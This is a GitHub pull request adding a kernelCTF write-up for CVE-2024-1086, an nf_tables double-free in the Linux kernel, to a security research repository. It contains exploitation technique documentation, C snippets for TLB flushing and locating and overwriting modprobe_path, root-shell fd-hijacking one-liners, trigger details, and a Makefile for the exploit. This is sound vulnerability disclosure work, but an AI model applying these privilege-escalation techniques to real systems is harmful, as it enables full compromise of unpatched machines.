Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

kernelCTF: added CVE-2024-1086 lts mitigation #96

Merged
merged 39 commits into from
Sep 12, 2024
Merged
Show file tree
Hide file tree
Changes from 23 commits
Commits
Show all changes
39 commits
Select commit Hold shift + click to select a range
6bbf4c3
kernelCTF: added CVE-2024-1086 lts mitigation
Notselwyn Apr 3, 2024
4679759
fix: musl-tools added
Notselwyn Apr 4, 2024
2247e38
fix: trying apt update to fix include issue?
Notselwyn Apr 4, 2024
abf94e0
fix: tred fixing includes replacing musl-gcc with gcc. stability conc…
Notselwyn Apr 4, 2024
6bd783b
fix: reversed previous commit. invalid AVX512 instructions
Notselwyn Apr 4, 2024
f8dc724
fix: tried including -mno-avx512f
Notselwyn Apr 4, 2024
3a2e162
fix: tried replacing musl-gcc with gcc
Notselwyn Apr 4, 2024
ace0b44
fix: reverse previous -mno-avx512f commit (it does not fix static gli…
Notselwyn Apr 4, 2024
c4f8d3c
fix: attempted fix by inversing include dirs, and added debug statements
Notselwyn Apr 7, 2024
d2b943d
fix: added debug statements
Notselwyn Apr 7, 2024
7ed3c6e
fix: added more debuig
Notselwyn Apr 7, 2024
6001429
fix: added header files
Notselwyn Apr 7, 2024
6a47e54
fix: added UAPI header files for lts
Notselwyn Apr 7, 2024
9d205d3
fix: removed debug statements
Notselwyn Apr 7, 2024
65aaf65
CVE-2024-1086: added more info to exploit (still incomplete)
Notselwyn Apr 22, 2024
a4da963
fix: completed exploit.md
Notselwyn May 15, 2024
e9bf593
docs: added abbreviations for diagram
Notselwyn Jul 24, 2024
af171cb
docs: added references in code snippet
Notselwyn Jul 24, 2024
b16d13d
docs: explained ip struct values in detail
Notselwyn Jul 24, 2024
f9231eb
docs: included link to blogpost
Notselwyn Jul 24, 2024
7c81a0c
docs: fixed PUD pagetable layer nr
Notselwyn Jul 25, 2024
3a7fdcd
docs: improved documentation for dirty pagetable technique
Notselwyn Jul 25, 2024
e79a21a
docs: changed paths to external repo to relative path in repo
Notselwyn Jul 29, 2024
5b669bd
Update novel-techniques.md
Notselwyn Sep 10, 2024
cfc6857
test: kernelctf gcc static compile
Notselwyn Sep 11, 2024
8052699
Merge branch 'master' of https://github.com/Notselwyn/security-research
Notselwyn Sep 11, 2024
fa84cc2
test: added libmnl-dev dependency for header
Notselwyn Sep 11, 2024
7d25ba8
fix: added libnftnl headers to dependencies
Notselwyn Sep 11, 2024
c947564
test: switched to using apt installed headers
Notselwyn Sep 11, 2024
af609ba
fix: include header path
Notselwyn Sep 11, 2024
13106b9
fix: changed include path order
Notselwyn Sep 11, 2024
c430f4a
fix: include with incorrect header paths
Notselwyn Sep 11, 2024
0a7cabc
fix: linux header include path
Notselwyn Sep 11, 2024
04004a6
chore: got rid of header bomb lol
Notselwyn Sep 11, 2024
9babeec
fix: asm headers
Notselwyn Sep 11, 2024
b58725c
fix: asm-generic headers (please let this be the last)
Notselwyn Sep 11, 2024
4ce9f15
fix: asm headers
Notselwyn Sep 11, 2024
78128d5
fix: got rid of header nuke
Notselwyn Sep 11, 2024
3d18475
chore: got rid of header nuke for real this time
Notselwyn Sep 11, 2024
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
The table of contents is too big for display.
Diff view
Diff view
  •  
  •  
  •  
721 changes: 721 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md

Large diffs are not rendered by default.

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Original file line number Diff line number Diff line change
@@ -0,0 +1,205 @@
# novel-techniques

TODO: increase description granularity for techniques proven to be novel.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I see there is still a TODO here, do you want to make any changes before we merge this?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for picking it up. If you believe the explanations are detailed enough, I'm fine with the way it currently is :-)

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Could you please still look into if you can exclude the header files?

There are several other nftables submissions in the repo and in the PRs. Is there anything different in your submission which does not make this possible?


## Bypassing KernelCTF mitigation instance corruption checks for skb's

One of the mitigations in the KernelCTF Mitigation instance is checking the freelist next pointer when allocating an object through a freelist pointer.

In the exploit, the following happens when doing the double-free:
1. alloc skb1
2. free skb1 (set new freelist pointer)
3. modify skb->len (overlapping with freelist next pointer)
4. free skb1 (set new freelist pointer)

This means upon step 3 the freelist next pointer gets corrupted. `CONFIG_FREELIST_HARDENED` is excluded here for demonstration purposes. When the background applications in the system try to transmit packets, they will inevitably try to allocate the skb object with the corrupted freelist next pointer, causing a system crash.

To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. Hence, we can mask the corrupted object by spraying "healthy" objects which can be allocated instead. Hence, it would look like this:

1. alloc N skb objects
2. alloc skb1
3. free skb1 (set new freelist pointer)
4. modify skb->len (overlapping with freelist next pointer)
5. free N skb objects
6. free skb1 (set new freelist pointer)

Whilst this is probably not the vulnerability which freelist next pointer corruption detection is intended to mitigate, it would definitively mitigate exploiting this specific scenario.

The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.


## Dirty Pagedirectory (pagetable confusion)

Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.

By overlapping an PUD page and PMD page (PUD+PMD), or an PMD page and a PTE page (PMD+PTE), we can set pagetable entries from userland pages. This allows for a *very* powerful primitive allowing the exploit to do rapid memory read/writes across all physical memory of the system.

> Note: it does **not** make use of recursion, as (in case of PUD+PMD) the PMD is not the child of the overlapped PUD, but is the child of a normal, arbitrary PUD.

Note how PT entries not only include the physical address (PFN), but also the page flags. Hence, we can write to read-only pages like modprobe_path. As if that isn't enough, we can set the target area to 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) addresses at the same time. Ofcourse, this can be limited to save memory usage and overhead.

In the blogpost, this diagram tries to describe it:

![Dirty Pagedirectory diagram showing the relations between different pagetable layers in an exploit](https://pwning.tech/content/images/2024/03/dirtypagedirectory.svg)


## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks

In order to bypass certain double-free detections, we need to free skb's on specific timings on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access (due to double-free) corrupted fields in the skb.

Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make it wait `ipfrag_time` seconds until all fragments are freed. Alternatively, it gets freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).

If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`.

Unfortunately, the target length of the IFQ is depending on skb->len, which is corrupted by the double-free. Hence, we need to do this by triggering an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.

It looks like this in action with the double-free:
1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
2. free skb1 (1) @ CPU `X`
3. make skb1 go into IFQ (utilizing its' content)
4. do stuff here, like spraying skb's, spraying PTEs, etc
5. alloc skb2 (errornous IPv4 fragment) @ CPU `Y`
6. free skb2 @ CPU `Y`
7. free skb1 @ CPU `Y`

## Fileless privesc using fd hijacking

We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the `/bin/sh` instance as root triggered by the `modprobe_path` technique.

For example:
- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`

This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.

## Fileless privesc using modprobe_path + procfs

We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.

We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.

## TLB flushing with PCID enabled

One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the CPU needs to be pinned, to avoid flushing an incorrect CPU core's TLB cache.

The code for this looks like:

```c
#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }

// presumably needs to be CPU pinned
static void flush_tlb(void *addr, size_t len)
{
short *status;

status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

*status = FLUSH_STAT_INPROGRESS;
if (fork() == 0)
{
munmap(addr, len);
*status = FLUSH_STAT_DONE;
sleep(9999);
}

SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

munmap(status, sizeof(short));
}
```

Note that the child sleeps instead of exits, to avoid certain kernel bugs when doing dirty pagedirectory.

## Easing physical KASLR bruteforce

It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel must be aligned to 16MiB or 2MiB, reducing the amount of possible base addresses from e.g. 8GiB addresses (assuming 8GiB physical memory) to 512 addresses (a bruteforcable amount).

## Validating the correct modprobe_path

We can validate if we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory), by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel.

For example, this can be done with:

```c
static int get_modprobe_path(char *buf, size_t buflen)
{
int size;

size = read_file("/proc/sys/kernel/modprobe", buf, buflen);

if (size == buflen)
printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");

// remove \x0a
buf[size-1] = '\x00';

return size;
}

static int strcmp_modprobe_path(char *new_str)
{
char buf[KMOD_PATH_LEN] = { '\x00' };

get_modprobe_path(buf, KMOD_PATH_LEN);

return strncmp(new_str, buf, KMOD_PATH_LEN);
}

void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
{
void *pmd_modprobe_addr;

// search 0x200000 bytes (a full PTE at a time) for the modprobe_path signature
pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
if (pmd_modprobe_addr == NULL)
return NULL;

// check if this is the actual modprobe by overwriting it, and checking /proc/sys/kernel/modprobe
strcpy(pmd_modprobe_addr, "/sanitycheck");
if (strcmp_modprobe_path("/sanitycheck") != 0)
{
printf("[-] ^false positive. skipping to next one\n");
return NULL;
}

return pmd_modprobe_addr;
}
```

## Page refcount juggling

When freeing a page, the Linux kernel checks if the pages' refcount is 0. If it is not, it will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:

1. alloc obj1 | refcount 0 -> 1
2. free obj1 | refcount 1 -> 0
3. alloc obj2 | refcount 0 -> 1
4. free obj1 | refcount 1 -> 0
5. alloc obj3 | refcount 0 -> 1

obj2 and obj3 will now be overlapping (having the same page), because the refcounts were always 0 when freeing.

```c
void __free_pages(struct page *page, unsigned int order)
{
/* get PageHead before we drop reference */
int head = PageHead(page);

if (put_page_testzero(page))
free_the_page(page, order);
else if (!head)
while (order-- > 0)
free_the_page(page + (1 << order), order);
}
```

## Double-free order 4 to order 0 (old: race condition)

When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.

This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.

## Double-free order X to order Y (new: PCP refill)

When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4` such that it will end up in the buddy allocator freelist. Then, we can allocate it to the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.

This is the new variant of the race condition-based method.
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
# vulnerability

Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.

## technical details

### outlines

The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.

The impact of this is a stable double-free primitive on both `struct sk_buff` objects, as well as `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).

The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, as this wouldn't allow userland applications to provide any drop errors anymore. It did not make sense to the kernel developers that userland applications could do this anyways, so hence they fully disabled it.

### triggering the bug

An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`.

When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`.

This causes the caller of `nf_hook_slow()` to misinterpret the situation (it believes the packet has not been freed, and should be handled), and continue parsing the packet and eventually double-free both the skb object and its skb->head object.

## requirements

Capabilities:
- `CAP_NET_ADMIN`

Kernel configuration:
- `CONFIG_NF_TABLES=y`
- `CONFIG_NETFILTER=y`

User namespaces needed:
- Yes, in order to setup rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)

## version info

Commit which introduced the vuln:
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007

Commit which fixed the vuln (revert of previous commit):
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660

Affected kernel versions:
- everything between `v3.5` and `v6.8-rc1`
- excluding `v6.1.76` and higher on `v6.1.x`
- excluding `v6.6.15` and higher on `v6.6.x`
- excluding `v6.7.3` and higher on `v6.7.x`
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
# and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

# use custom headers with fixed versions in a musl-gcc compatible manner
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
# - ./include/linux-lts-6.1.72: linux v6.1.72
CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones
# are used with gcc and have _chk funcs which musl doesn't support
# the versions are the same as the headers above
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
prerequisites: _install_musl
run: _run_outfile
clean: _clean_outfile

_install_musl:
sudo apt-get install musl-tools
_compile_static:
$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
_strip_bin:
strip $(OUT_NAME)
_run_outfile:
$(OUT_NAME)
_clean_outfile:
rm $(OUT_NAME)
Binary file not shown.
Loading
Loading